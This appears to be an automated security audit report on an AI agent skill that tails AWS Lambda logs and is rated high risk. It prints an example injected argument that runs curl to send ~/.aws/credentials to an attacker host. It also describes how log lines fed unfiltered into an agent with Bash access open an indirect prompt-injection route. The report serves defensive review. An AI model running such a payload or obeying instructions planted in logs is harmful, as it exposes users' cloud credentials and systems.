logs
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill performs direct shell interpolation of the
$ARGUMENTSvariable in the commandaws logs tail /aws/lambda/pitfal-$ARGUMENTS. An attacker can provide input likecontact; curl http://attacker.com/$(cat ~/.aws/credentials)to execute arbitrary logic. - [DATA_EXFILTRATION] (MEDIUM): The command injection vulnerability can be leveraged to read sensitive files (e.g., AWS credentials, environment variables) and exfiltrate them via the network.
- [PROMPT_INJECTION] (LOW): The skill is vulnerable to indirect prompt injection (Category 8) by processing untrusted data. • Ingestion points: CloudWatch log streams (SKILL.md). • Boundary markers: Absent; log lines are printed directly to the agent's context. • Capability inventory: Full Bash shell access via the Bash tool. • Sanitization: None; the skill does not escape or filter log content that may contain malicious instructions for the LLM.
Recommendations
- AI detected serious security threats
Audit Metadata